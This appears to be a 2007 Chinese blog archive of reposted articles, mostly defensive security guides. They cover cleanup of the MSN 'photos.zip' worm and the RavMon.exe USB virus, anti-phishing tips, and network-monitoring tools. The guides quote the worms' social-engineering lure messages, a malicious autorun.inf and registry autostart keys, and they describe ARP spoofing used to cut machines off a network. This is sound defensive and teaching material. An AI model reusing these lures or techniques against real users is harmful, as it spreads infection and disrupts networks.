  “三天不上网,回头就下岗.”十年前,网络开始在中国盛行时,曾经有公司贴出这样告示,提醒员工要注意学习电脑知识特别是网络知识,以应对网络时代的新要求.这样的一句充满调侃的告示,在网络危机盛行的当下,我们却可以从中解读出更深切的警示意味.

  对任何一个企业而言,身处这样一个危机无处不在,负面消息随时出现的网络时代,应对危机的最好方法就是构筑起危机天盾,去应对危机事件的发生与处理.

  危机天盾应对网络危机的核心就在于:监测、跟进、平衡.

  面对每日网络海量的信息发布,企业可以建立一套网络实时监控系统和即时电子传输和警示系统,通过技术手段加人员监测的方式,全面有效地对网络信息进行过滤,将监测的范围从平面媒体、门户网站、专业网站,向下级网页中BBS、论坛、热点博客延伸,从中发现可能发生危机的关键信息,及时警示企业相关部门或人员给予重视.就比如LG的公关人员,明显将所有注意力放在主流媒体之上,对于网络个人式批评的帖子过于忽视.

  而当网络负面报道发生并引起一定关注时,企业应该立即启动网络危机应对方案,通过与危机发生的源头网站进行沟通,争取第一时间撤下该负面信息,并防止其他网络跟进.如果情况严重,外界关注强烈,企业就有必要迅速对事件做出说明,刊登启示,消解民众的猜测或误解.针对危机报道的内容,有步骤地开展针对性的应对措施.如当年百事可乐发生可乐瓶中出现针筒事件后,百事可乐化解危机的重要措施就是制作一辑关于自身工厂生产线的实时录像,详细介绍了其生产线的严格操作流程,明确向公众说明按百事的操作工序是不可能在可乐罐中出现针筒的,从而暗指此危机事件的发生存在幕后黑手.

  另外,也可以根据企业另一方面的有利信息,如产品销售飘红、新工厂投产等方面开展大量的信息传播,从而稀释危机报道的受关注度,这也属于平衡式危机处理的有效方式.

星期五, 六月 01, 2007

MSN相片“性感相册”PHOTOS.ZIP病毒专杀/手动清除方法

MSN相片“性感相册”病毒手动清除方法

作者:瑞星 来源:赛迪网

MSN性感相册专杀下载地址 http://download.jiangmin.info/jmsoft/MSNPhotoKiller.exe

病毒名称:MSN相片(Worm.Mail.Photocheat.a)

病毒类型:蠕虫病毒

病毒危害级别:★★★☆

病毒分析:

这是一个通过MSN进行传播的蠕虫病毒,病毒行为如下:

1、病毒运行后创建自己的压缩包命名为PHOTOS.ZIP释放到%WINDIR%目录下,放出一名为syshosts.dll的动态库到%SYSTEM%目录下,将动态库蛀入系统多个线程中实现其传播的功能。

2、病毒会自动创建如下注册表项,实现自启动。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

"syshosts" = {1E3EF678-AFB7-4420-9CCF-3725505ACA10}

3、病毒会将生成的PHOTOS.ZIP通过MSN模拟键盘和鼠标操作发送给其他联系人,发送消息如下:

Here are my private pictures for you

Here are my pictures from my vacation

My friend took nice photos of me.you Should see em loL!

its only my photos!

Nice new photos of me and my friends and stuff and when i was young lol...

Nice new photos of me!! :p

Check out my sexy boobs :D

hey regarde mes tof!! :p

ma soeur a voulu que tu regarde ca!

hey regarde les tof, c'est moi et mes copains entrain de.... :D

j'ai fais pour toi ce photo album tu dois le voire :)

tu dois voire ces tof

mes photos chaudes :D

c'est seulement mes tof :p

zijn enige mijn foto's

wanna Hey ziet mijn nieuw fotoalbum?

indigde enkel nieuw fotoalbum! :)

hey keurt mijn nieuw fotoalbum goed.. :p

het voor yah, doend beeldverhaal van mijn leven lol..

en Fotos ! :p

le mie foto calde :p

mis fotos calientes

as :p

lbum de foto

4、病毒运行后将访问www.free8.bi的地址,以特定的昵称,登录到特定的IRC频道上,并在IRC聊天频道中散播消息。

手工清除方法

一、删除病毒在注册表中的启动项目

1、点击“开始”菜单,选择运行。输入“regedit.exe”启动注册表编辑器。

2、打开

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

项,找到名为“syshosts”一项,将其值记录下来。例如本机中该值为“{8D4C2FB9-6DF1-46EA-B6A0-6403640115D6}”。(见图一)



图一

3、将syshosts项删除。

4、打开注册表中的HKEY_CLASSES_ROOT\CLSID项,找到刚刚记录下的项目,本例中为{8D4C2FB9-6DF1-46EA-B6A0-6403640115D6}(见图二)。



图二

5、重新启动计算机。

二、删除病毒文件

1、打开“我的电脑”,选择菜单“工具”-》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。同时取消掉“隐藏已知类型文件的扩展名”前的对勾,然后点击“确定”。

2、进入Windows文件夹(默认为C:\Windows),找到名为“photos.zip”的文件,将其删除。如图三所示。



图三

3、进入系统文件夹(默认为C:\Windows\system32),找到名为“syshosts.dll”的文件,将其删除。



图四

4、再次重新启动计算机,查看这两个文件是否存在,若不存在,则说明病毒已经被清除干净。

该病毒手工清除需要具有一定的计算机操作水平,一般用户可直接升级杀毒软件至最新病毒库清除该病毒。

紧急警报!“性感相册”病毒发带毒文件

作者:T木 来源:赛迪网

下午,同事收到有人在MSN上传来的一个压缩文件,MSN上先是说:“Here are my private pictures for you”,然后就会发来一个压缩包,文件名是“photos.zip”,文件大小约468KB。一旦点击接收后,就会显示:“Nice new photos of me and my friend and stuff and when i was young lol...”

同时,江民反病毒中心也监测到,一个名为“性感相册”的蠕虫病毒正在互联网上疯狂传播。该病毒会自动搜索电脑中MSN的联系用户名单,向所有的联系人随机发送带有诱惑性的英文消息如“My friend took nice photos of me. You Should see them loL!、check out my sexy books”等(我的朋友给我拍了些好看的照片,你应该看看……、看看我的色情书),并试图传送名为“photos.zip”的压缩包,用户接受并解压缩文件即会中毒。

该病毒十分隐蔽,中毒电脑无异常表现,而病毒会在后台秘密向所有MSN联系人发送包含病毒的压缩包,解压后即会中毒。

由于该病毒利用MSN的联系名单传播病毒,影响范围非常大,江民反病毒专家提醒广大用户,不要轻易接收和运行MSN上传来的不明文件,尤其是名称为“photos.zip”的压缩包。



同事接收到MSN画面



病毒发来的图片文件



接收后的现象

同时金山毒霸反病毒专家戴光剑表示,此次大面积发作的针对MSN用户的病毒并非之前的“MSN照片”病毒,而是一名为“MSN机器人”的病毒。

“MSN机器人”(Worm.MsnBot.h)病毒正在利用MSN聊天工具疯狂传播,仅6月1日下午短短几个小时就有数万用户中招。为此,金山毒霸已发布紧急预警,建议用户立即升级病毒库,拒绝接收名为photos.zip的压缩包。

“今天下午,突然有3、4个MSN好友同时发过来一个名为photos的压缩包,还附有Hereare my pictures from my vacation或“My friend took nice photos of me.YouShould seeem loL!、check out my sexy books”的英文,与此同时,身边的同事也纷纷收到类似的东东,影响非常大。”用户蒋女士表示。

该病毒运行后,会把自己拷贝到系统目录下%system%\\syshosts.dll,并把自己压缩后放到以下目录%windows%\\photos.zip。病毒会寻找MSN的窗口,并尝试发送自己,发送前先随机发送以下文字:

Here are my pictures from my vacation

My friend took nice photos of me.you Should see em loL!

its only my photos!

Nice new photos of me and my friends and stuff and when i was young lol...

Nice new photos of me!! :p

Check out my sexy boobs :D

hey regarde mes tof!! :p

ma soeur a voulu que tu regarde ca!

hey regarde les tof, c'est moi et mes copains entrain de.... :D

j'ai fais pour toi ce photo album tu dois le voire :)

据了解,类似“MSN机器人”这类病毒,一般是通过如下流程进行传播:病毒制作者制作完成后通过某种渠道如捆绑下载等渠道发布出去,MSN用户感染该病毒后,可立即在MSN好友之间相互传播。

专家在分析病毒时发现,与之前病毒MSN机器人病毒不同,该病毒拒绝在虚拟机中运行,为病毒分析带来了一定麻烦。根据该病毒的传播特点,金山毒霸全球反病毒中心已经启动紧急病毒处理流程,金山毒霸的用户升级到最新的病毒库即可查杀。同时,金山毒霸反病毒专家提醒广大用户三步应对该病毒:

1、拒绝接受病毒文件。用户如发现有MSN好友发送类似信息,立即关闭该窗口,并通知发送信息的好友,及时查毒;

2、如果已经接受,千万不要打开该文件;

3、升级杀毒软件到最新病毒库,开始实时监控以及防火墙等功能;

鉴于该病毒传播迅速,影响范围比较广,金山毒霸快速推出了手动解决办法:开启金山毒霸反间谍2007中的文件粉碎器,查找以下文件:%system%\\syshosts.dll、%windows%\\photos.zip 彻底删除。

MSN大面积中毒 感染后自动传播

作者:徐新事 | 出处:DoNews |

  DoNews(北京)6月1日快讯(记者 徐新事)今天下午15:08分起,不断有MSN好友向记者发送一个Photos.zip文件,经证实是新的MSN病毒。

十分钟内,有来自全国各地的30多位MSN好友都向记者发送该文件。

  据趋势专家介绍,这是2003年的photos.zip的病毒的变种。

  病毒症状:被感染用户向MSN好友发送相同文件,或者发送my sexy photos的压缩包,用户应该拒绝接收。

  扫描类型: 手动 扫描

  事件: 已发现病毒!

  病毒名称: Infostealer.Gampass

  文件: C:\Documents and Settings\user\Local Settings\Temp\mhso.exe

  位置:隔离区

  计算机:LENOVO-E5CA6843

  用户:user

  采用的操作:清除 失败 : 隔离 成功 :

  发现的日期: Fri Jun 01 15:33:19 2007

  修复:计算机用户可以即刻登录趋势科技网站或8844网站(http://8844.com),下载趋势杀毒软件90天免费版,立即清除。

U盘病毒AutoRun.inf和ravmon.exe的KILL

U盘病毒AutoRun.inf和ravmon.exe的KILL

对Autorun.inf类病毒(U盘病毒)的攻防经验总结

三点高招教你解除闪存盘内的病毒!

关于开机自动打开C盘目录的解决方法

技术分析系列之详解来自Autorun的攻击

iPod中的病毒的详情和解决方法

U盘病毒和Autorun.inf文件分析

近来学校与寝室AutoRun.inf和ravmon.exe等U盘病毒异常猖狂``引起众人强烈不满

该病毒自动修改注册表,让用户不能查看隐藏文件autorun.inf内容如下

[AutoRun] open=RavMon.exe shell\open=打开(&O) shell\open\Command=RavMon.exe shell\explore=资源管理器(&X) shell\explore\Command="RavMon.exe -e" 用前些日子的注册表导入结果能正常显示,重起蓝屏 

重装系统再点其他盘又感染,且右键只有打开无auto

尝试用BAT@echo on

taskkill /im explorer.exe /f

taskkill /im wscript.exe

start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f

start reg import kill.reg

del c:\autorun.* /f /q /as

del %SYSTEMROOT%\system32\autorun.* /f /q /as

del d:\autorun.* /f /q /as

del e:\autorun.* /f /q /as

del f:\autorun.* /f /q /as

del g:\autorun.* /f /q /as

del h:\autorun.* /f /q /as

del i:\autorun.* /f /q /as

del j:\autorun.* /f /q /as

del k:\autorun.* /f /q /as

del l:\autorun.* /f /q /as

start explorer.exe

删除其病毒文件

重启如故

于是用REG导入

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="@shell32.dll,-30501"

"Type"="radio"

"CheckedValue"=dword:00000002

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51104"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51105"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

"Type"="checkbox"

"Text"="@shell32.dll,-30508"

"WarningIfNotDefault"="@shell32.dll,-28964"

"HKeyRoot"=dword:80000001

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"ValueName"="ShowSuperHidden"

"CheckedValue"=dword:00000000

"UncheckedValue"=dword:00000001

"DefaultValue"=dword:00000000

"HelpID"="shell.hlp#51103"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\Policy]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\Policy\DontShowSuperHidden]

@=""

无效!!查看Ravmon.exe性状如下

RavMon.exe

进程文件: RavMon.exe Svchost.exe

进程名称: Troj_Worm.Novar

英文描述: N/A

进程分析:

瑞星杀毒软件实时监控程序。

进程位置: 系统目录

程序用途: VisualBasic写的可通过可移动设备传播的病毒,极具破坏性。

安全等级 (0-5): 0 (N/A无危险 5最危险)

间碟软件: 是

广告软件: 是

病毒: 是

木马: 是

系统进程: 否

应用程序: 否

后台程序: 是

使用访问: 是

访问互联网: 否

于是通过开始菜单,运行cmd,到类DOS界面。输入某个盘符,打开它,用dir /a查看所有文件,发现有一个RavMon.exe。瑞星也有个程序叫RavMon.exe,所以很有迷惑性,用attrib看它的属性,如果是SHR属性的,就是病毒了。

rose病毒也有类似现象,所以如果发现是rose.exe的话,就是rose病毒了,解决办法类似。

进入安全模式(必须确保是安全模式下,并期间千万不要双击盘符,否则前功尽弃!)

第一步:

通过开始菜单,运行regedit打开注册表,选择编辑查找,输入RavMon.exe(如果是rose就是rose.exe),找到键值后删除它,然后按F3,继续查找,把所有的RavMon.exe键值都删除。确保这一点,是为了断了RavMon.exe的根源。

第二步:

通过开始菜单,运行cmd,到类DOS界面,进入某个盘,用attrib -h -s -r AutoRun.inf和attrib -h -s -r RavMon.exe来消除这两个文件的隐藏只读特性,然后用del AutoRun.inf和del RavMon.exe来删除它们。之所以要对AutoRun.inf动手的原因是RavMon.exe病毒修改了AutoRun.inf文件,使得你的硬盘打不开了。对每个硬盘都如此操作一边,注意:如果使用过U盘的话,对U盘也要操作!那里面也带了病毒。

4. 完成:

重启到正常模式,双击盘符,应该是可以打开了;网上有人说有可能会还打不开,提示你要定位一个什么东西,我没有碰到。有人的方法是这样的:如出现要求你定位某个命令,如DESKTOP.EXE或其它时,运行regedit,选择编辑查找,输入DEKTOP.EXE或其它,找到的第一个就是C盘的自动运行,删除整个shell子键

最后清除病毒


十大注意事项 防止系统重装时遭遇病毒

作者:dingdd 来源:赛迪网

很多人认为,只要重新安装了操作系统,就可以彻底清除病毒。但却不知道在操作系统进行重新安装后,由于安全设置以及补丁未及时安装等问题,最容易导致病毒的大肆入侵,因此一些必备的补充措施是非常关键的。

一、不要急着接入网络

在安装完成Windows后,不要立即把服务器接入网络,因为这时的服务器还没有打上各种补丁,存在各种漏洞,非常容易感染病毒和被入侵。此时要加上冲击波和震撼波补丁后并重新启动再联入互联网。

二、给系统打补丁/安装杀毒软件

不用多说,冲击波和震荡波病毒的补丁是一定要打上的,如果你安装了Windows XP SP2则不用再另行安装。

安装完系统后,一定要安装反病毒软件,同时将其更新到最新版本。

三、关闭系统还原

系统还原是Windows ME和Windows XP、Windows 2003中具有的功能,它允许我们将系统恢复到某一时间状态,从而可以避免我们重新安装操作系统。不过,有的人在执行系统还原后,发现除C盘外,其它的D盘、E盘都恢复到先前的状态了,结果里面保存的文件都没有了,造成了严重的损失!

这是由于系统还原默认是针对硬盘上所有分区而言的,这样一旦进行了系统还原操作,那么所有分区的数据都会恢复。因此,我们必须按下Win+Break键,然后单击“系统还原”标签,取消“在所有驱动器上关闭系统还原”选项,然后选中D盘,单击“设置”按钮,在打开的窗口中选中“关闭这个驱动器上的系统还原”选项。

依次将其他的盘上的系统还原关闭即可。这样,一旦系统不稳定,可以利用系统还原工具还原C盘上的系统,但同时其他盘上的文件都不会有事。

四、给Administrator打上密码

可能有的人使用的是网上下载的万能Ghost版来安装的系统,也可能是使用的是Windows XP无人值守安装光盘安装的系统,利用这些方法安装时极有可能没有让你指定Administrator密码,或者Administrator的密码是默认的123456或干脆为空。这样的密码是相当危险的,因此,在安装完系统后,请右击“我的电脑”,选择“管理”,再选择左侧的“计算机管理(本地)→系统工具→本地用户和组→用户”,选中右侧窗口中的Administrator,右击,选择“设置密码”。

在打开窗口中单击“继续”按钮,即可在打开窗口中为Administrator设置密码。

另外,选择“新用户”,设置好用户名和密码,再双击新建用户,单击“隶属于”标签,将其中所有组(如果有)都选中,单击下方的“删除”按钮。再单击“添加”按钮,然后再在打开窗口中单击“高级”按钮,接着单击“立即查找”按钮,找到PowerUser或User组,单击“确定”两次,将此用户添加PowerUser或User组。注销当前用户,再以新用户登录可以发现系统快很多。

五、关闭默认共享

Windows安装后,会创建一些隐藏共享,主要用于管理员远程登录时管理系统时使用,但对于个人用户来说,这个很少用到,也不是很安全。所以,我们有必要要切断这个共享:先在d:\下新建一个disshare.bat文件,在其中写上如下语句:

@echo off

net share C$/del

net share d$/del

netshare ipc$/del

net share admin$ /del

接下来将d:\disshare.bat拷贝到C:\Windows\System32\GroupPolicy\UserScripts\Logon文件夹下。然后按下Win+R,输入gpedit.msc,在打开窗口中依次展开“用户配置→Windows设置→脚本(登录/注销)”文件夹,在右侧窗格中双击“登录”项,在弹出的窗口中,单击“添加”命令,选中C:\Windows\System32\GroupPolicy\UserScripts\Logon文件夹下的disshare.bat文件。

完成上述设置后,重新启动系统,就能自动切断Windows XP的默认共享通道了,如果你有更多硬盘,请在net share d$/del下自行添加,如netshare e$/del、net share f$/del等。

六、启用DMA传输模式

启用DMA模式之后,计算机周边设备(主要指硬盘)即可直接与内存交换数据,这样能加快硬盘读写速度,提高数据传输速率:打开“设备管理器”,其中“IDE ATA/ATAPI控制器”下有“主要IDE通道”和“次要IDE通道”,双击之,单击“高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,单击列表按钮将“传输模式”设置为“DMA(若可用)”。重新启动计算机即可生效。

七、启用高级电源管理

有时候安装Windows XP之前会发现没有打开BIOS电源中的高级电源控制,安装Windows XP后,关闭Windows时,电源不会自动断开。这时,很多人选择了重新打开BIOS中的高级电源控制,并重新安装Windows XP。事实上,用不着这么麻烦,只要大家确认已经在BIOS中打开高级电源控制选项,同时选择ACPI Pc,一定不要选错,否则重启后可能无法进入Windows,并重新启动电脑,电脑可能会重新搜索并自动重新安装电脑的硬件,之后就可以使其支持高级电源控制了。

八、取消压缩文件夹支持

单击开始→运行,输入“regsvr32 /u zipfldr.dll”回车,出现提示窗口“zipfldr.dll中的Dll UnrgisterServer成功”即可取消Windows XP的压缩文件夹支持。另外,输入regsvr32 shdocvw.dll可以取消“图片和传真”与图片文件的关联。

九、取消“磁盘空间不足”通知

当磁盘驱动器的容量少于200MB时Windows XP便会发出“磁盘空间不足”的通知,非常烦人。可以打开“注册表编辑器”,定位到HKEY_CURRENT_USER\Software

\Microsoft\Windows\CurrentVersion\Policies\Explorer,在“Explorer”上单击右键,选择右键菜单上的“新建”→“DWORD值”,将这个值命名为“NoLowDiskSpaceChecks”,双击该值将其中的“数值数据”设为“1”。

十、启用验证码

安装SP2后,大多数用户发现在访问某些需要填写验证码的地方,都无法显示验证码图片(显示为一个红色小叉),这是一个非常严重的Bug。解决办法为:运行“Regedit”命令打开注册表编辑器,依次定位到“[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]”,在窗口右边新建一个名为“BlockXBM”的REG_DWORD值,将其值设置为“0”(十六进制值)。

莫当鱼饵被人钓 网上防骗大曝光

莫当鱼饵被人钓 网上防骗大曝光

出处:网友世界 作者:俞木发

 互联网已经融入了我们的生活,通过互联网我们可以和好友实时交流、可以购买网店商品、可以实时进行银行转帐。不过,很多不怀好意的人也正通过互联网布下道道陷阱,如何规避上网的风险,识破各种网络陷阱?今天我们就一起来擦亮双眼识陷阱!

  一、域名转向要看清

  域名是一个网站的标记,很多朋友都是通过域名来识别网站,一般认为知名的大网站就没有什么问题。其实很多恶意网站是通过大网站提供的域名转向来迷惑我们的,比如,网易就提供http://用户名.126.com域名转向功能服务,有些挂木马网站注册类似“http://qqstart.126.com”域名,这样一旦我们访问上述网址,IE就会自动转向真正木马网站而中招。

  防范建议:转向网站最明显的症状就是点击链接后会出现某某网站域名转向服务提示页面(如图1)。



图1 域名转向页面

打开网页后显示的是另一个网址的页面,一些中奖、优惠提示链接经常使用此类转向,一定要小心!不过要注意的是,很多大型网站也通过二级域名来作为其子服务页面,比如http://game.qq.com/(注意:不是http://www.game.qq.com/)是QQ游戏页面,大家记住QQ的所有二级域名都是qq.com结尾的,要防止访问类似http://game.qq.566qq.com字样的页面。

  小提示:

  一些黑客会修改“c:\windows\system32\drivers\etc\host”文件,然后将常见网址访问指向到恶意网站。如果发现输入常见网址如www.sina.com,打开的不是新浪的页面,这时一定要检查上述文件是否已被篡改。

  

  二、真实域名要分清

  由于域名的名称后缀有很多,一些人便利用虚假的域名来蒙混我们。比如,前段时间有人便冒用http://www.1cbc.com.cn/index.jsp域名来仿冒工商银行网站(使用1CBC来代替ICBC),这样用户一旦访问假冒银行网站并输入帐号、密码,自己银行卡上的财产就会受到损失。

  防范建议:对于经常使用网上银行的用户,强烈建议将真正银行的网站添加到收藏夹,使用网上银行时直接通过收藏夹打开,而不是单击其它链接地址打开网页(如图2)。



图2 把真正的网址添加入收藏夹

  小提示

  此外,有些恶意网页是通过其他域名来迷惑人的。比如,前段传得沸沸扬扬的免费送6位QQ号码,他们就是通过http://www.tencent.cc/vip.htm?qq=656522迷惑人的,这个http://www.tencent.cc根本不是腾讯的官方网站。

三、网站备案要查清

  为了规范互联网,信息产业部要求所有的网站都必须备案(ICP认证)。如果对某些网站产生怀疑,我们可以通过ICP认证查询,进一步确认网站信息是否准确。比如访问上述工行的网站后,可以看到它的ICP认证号是京ICP证 030247号。现在打开http://www.miibeian.gov.cn/share/cx_dwfl_daimabiao.jsp?id=3,“查询选择”单选“根据备案许可证”,然后在“输入查询条件”输入“030247”,单击“查询”就可以获取ICP详细备案信息(如图3)。



图3 备案查询

如果发现一些备案网站有恶意信息,通过ICP查询还可以查询到网站备案详细信息,可以向有关部门举报。对于已被举报的恶意网站,还可以通过“黑名单”查询。

  防范建议:正规的网站都必须备案,对于那些没有备案认证的网站,下载、浏览都要引起注意。

  

  四、个人信息要弄清

  相信很多朋友都有到淘宝 、易趣等国网站购物,出售货物对方都会留下手机、QQ等联系方式。我们可以通过手机号码查询获取对方地址信息,以便判断对方是否有诈。比如,前段时间经常有外地不法分子冒充深圳商家在淘宝兜售所谓海关罚没商品,现在通过http://www.k369.com/zy/hmcx.htm可以轻松查到对方手机归属地。登录上述网站后,输入需要查询的号码,然后单击“查询”就可以获知结果了,显然这位商家有诈骗之嫌(如图4)。



图4 手机归属地查询

  防范建议:在进行网络交易前,一定要认真核查对方的信息,当然并非手机归属地查询正确就说明对方信息无误,对于网上购物我们还要查询对方信誉、口碑等信息,支付款一定要通过“支付宝”等专业工具来结算,以便更好保护自己。

  小提示:

  对于使用QQ交流的用户,可以通过显IP珊瑚虫版获取对方地址进一步验证。或者登录http://www.ip138.com/查询对方IP实际地址。

五、中奖邮件需查询

  Email已经成为我们日常交流的重要方式,一些不法分子也通过E-mail来诈骗。很多邮件冒称是微软、腾讯等的官方邮件,对于这些所谓的中奖邮件,一般通过查看邮件原始信息即可让其现身。在OE收件箱中双击需要查询的邮件,然后单击“文件”→“属性”,接着在打开的窗口切换到“详细信息”标签。这里的“Return-Path(回复路径(”就是对方发送邮件的地址,我们可以通过邮件后缀判断是否为官方邮件(如图5)。



图5 查看邮件原始信息

一些恶意邮件可能会伪造发送者地址、“Received”和“Message-ID”等信息,让我们无法准确查询邮件地址。不过邮件信息中“Received: from m2pserver5 ([211.157.21.27])”( 格式:Received: from对方邮件服务器 IP地址),这条信息是自己邮件服务器自动添加的,我们可以通过IP地址查询来查看对方邮件发送实际地址。

  防范建议:邮件附件是网络陷阱罪魁祸首,查询邮件信息后,即使是好友发来的邮件也要病毒扫描后才能打开。此外,强烈建议用纯文本模式阅读邮件以防中招。

  小提示:

  在Foxmail中打开邮件后,单击“邮件”→“查看原始信息”,然后切换到“头信息”标签可以看到邮件上述信息。

六、安全防护要到位

  前面介绍的是具体的网络陷阱,要有效的对付这些陷阱外,针对不同的软件还需安装相应的安全软件才能更有效对付陷阱。比如QQ的尾巴病毒会发出很多网络陷阱链接,我们只要使用金山公司的QQkav(下载地址:http://down.www.kingsoft.com/db/ ... DubaTool_QQTail.EXE),下载后直接单击“开始扫描”,如果发现QQ尾巴病毒就可以清除,这样就可以使网友们少踩很多的网络陷阱(如图6)。



图6 QQ尾巴专杀

  防范建议:对自己常用的工具软件一定要定期查毒,此外还要及时升级安全软件。

  小提示:

  上面我们介绍常见的网络陷阱,其实在这危机四伏的网络,互联网上还有许许多多的陷阱。除了要提高警惕外,安装一款强大的杀毒软件和防火墙,同时及时升级系统补丁,这样才能全方位避开陷阱!

Sniffer和网络执法官软件助你维护网络

Sniffer和网络执法官软件助你维护网络

作者:sanandi 来源:赛迪网技术社区

任何一款工具软件都有丰富的功能,所以在日常的网吧维护中,对于一款软件,不仅要知道其表面的功能,更要深入了解其工作原理,这样才能更有效地挖掘软件更高级的应用及功能,以此来解决网络中的疑难故障。下面结合一些日常网络故障实例,介绍一下Sniffer和网络执法官两款网络工具软件在网吧网络维护中的综合应用。

Sniffer——提高网络传输质量好帮手

Sniffer软件是NAI公司推出的功能强大的协议分析软件,具有捕获网络流量进行详细分析、实时监控网络活动、利用专家分析系统诊断问题、收集网络利用率和错误等功能。Sniffer Pro 4.6可以运行在各种Windows平台上,只要安装在网络中的任何一台机器上,都可以监控到整个网络。以下以Sniffer 4.70汉化版本为例,介绍一下Snffer在网吧网络维护中的具体应用。

一、Sniffer软件的安装

在网上下载Sniffer软件后,直接运行安装程序,系统会提示输入个人信息和软件注册码,安装结束后,重新启动,之后再安装Sniffer汉化补丁。运行Sniffer程序后,系统会自动搜索机器中的网络适配器,点击确定进入Sniffer主界面。

二、Sniffer软件的使用

打开Sniffer软件后,会出现主界面,显示一些机器列表和Sniffer软件目前的运行情况,上面是软件的菜单,下面有一些快捷工具菜单,左侧还有一排快捷菜单按钮。由于使用的是汉化版软件,因此部分词语汉化不是太准确。

1、获取网络中的机器列表

Sniffer软件运行后,首先要搜索网络中的机器。在“工具”菜单中找到“地址簿”选项并运行,在“地址簿”中的左侧工具菜单中,可以找到一个“放大镜”的图标,这是“自动搜索”的按钮。运行“自动搜索”功能后,在IP地址段中输入网络的开始IP地址和结束地址,然后系统会自动搜索。搜索完成后,会出现一个机器列表。

2、保存机器列表

Sniffer搜索网络中所有的机器列表后,可以在“数据库”菜单中选择“保存地址簿”选项,将当前的机器列表保存,以备日后使用。由于Sniffer的地址簿保存了网络中客户机的IP地址、网卡的MAC地址等信息,如果网络中的客户机更换了网卡,则必须重新搜索机器列表并重新保存地址簿。如果网络中没有新机器增加,就无需更新此地址簿。

三、Sniffer菜单及功能简介

Sniffer进入时,需要设置当前机器的网卡信息。进入Sniffer软件后,可以看到Sniffer软件的中文菜单,下面是一些常用的工具按钮。在日常的网络维护中,使用这些工具按钮就可以解决问题了。

1、主机列表按钮:保存机器列表后,点击此钮,Sniffer会显示网络中所有机器的信息,其中,Hw地址一栏是网络中的客户机信息。网络中的客户机一般都有惟一的名字,因此在Hw地址栏中,可以看到客户机的名字。对于安装Sniffer的机器,在Hw地址栏中用“本地”来标识;对于网络中的交换机、路由器等网络设备,Sniffer只能显示这些网络设备的MAC地址。

入埠数据包和出埠数据包,指的是该客户机发送和接收的数据包数量,后面还有客户机发送和接收的字节大小。可以据此查看网络中的数据流量大小。

2、矩阵按钮:矩阵功能通过圆形图例说明客户机的数据走向,可以看出与客户机有数据交换的机器。使用此功能时,先选择客户机,然后点击此钮就可以了。

3、请求响应时间按钮:请求响应时间功能,可以查看客户机访问网站的详细情况。当客户机访问某站点时,可以通过此功能查看从客户机发出请求到服务器响应的时间等信息。

4、警报日志按钮:当Sniffer监控到网络的不正常情况时,会自动记录到警报日志中。所以打开Sniffer软件后,首先要查看一下警报日志,看网络运行是否正常。

四、Sniffer在网络维护中的应用——解决网络传输质量问题

Sniffer在网吧网络中的应用,主要是利用其流量分析和查看功能,解决网吧中出现的网络传输质量问题。

1、广播风暴:广播风暴是网吧网络最常见的一个网络故障。网络广播风暴的产生,一般是由于客户机被病毒攻击、网络设备损坏等故障引起的。可以使用Sniffer中的主机列表功能,查看网络中哪些机器的流量最大,结合矩阵就可以看出哪台机器数据流量异常。从而,可以在最短的时间内,判断网络的具体故障点。

2、网络攻击:随着网络的不断发展,黑客技术吸引了不少网络爱好者。于是,一些初级黑客们,开始拿网吧来做实验,DDoS攻击成为一些黑客炫耀自己技术的一种手段,由于网吧本身的数据流量比较大,加上外部DDoS攻击,网吧的网络可能会出现短时间的中断现象。对于类似的攻击,使用Sniffer软件,可以有效判断网络是受广播风暴影响,还是来自外部的攻击。

3、检测网络硬件故障:在网络中工作的硬件设备,只要有所损坏,数据流量就会异常,使用Sniffer可以轻松判断出物理损坏的网络硬件设备。

网络执法官——智能监控高手

网络执法官是一款网管软件,可用于管理局域网,能禁止局域网任意机器连接网络。对网管来说,这个功能很实用,可是,现在这一优秀的管理工具软件,却成为许多捣乱分子的“凶器”,他们经常利用这一功能禁止一些机器正常上网。不过,只要充分了解网络执法官的具体功能,就可以轻松对付这些恶意的捣乱了。

一、网络执法官简介

在局域网中任意一台机器上运行网络执法官的主程序NetRobocop.exe ,都可以穿透防火墙、实时监控、记录整个局域网用户上线情况,限制各用户上线时所用的IP、时段,并可将非法用户踢下局域网。该软件适用范围为局域网内部,不能对网关或路由器外的机器进行监视或管理,适合局域网管理员使用。

在网络执法官中,如想限制某台机器上网,只要点击“网卡”菜单中的“权限”,选择指定的网卡号或在用户列表中点击该网卡所在行,从右键菜单中选择“权限”即可限制该用户的权限。对于未登记网卡,可以这样限定其上线:设定好所有已知用户(登记),将网卡的默认权限改为禁止上线即可阻止所有未知的网卡上线。其原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC地址,这样就可以禁止其上网。

二、网络执法官的功能

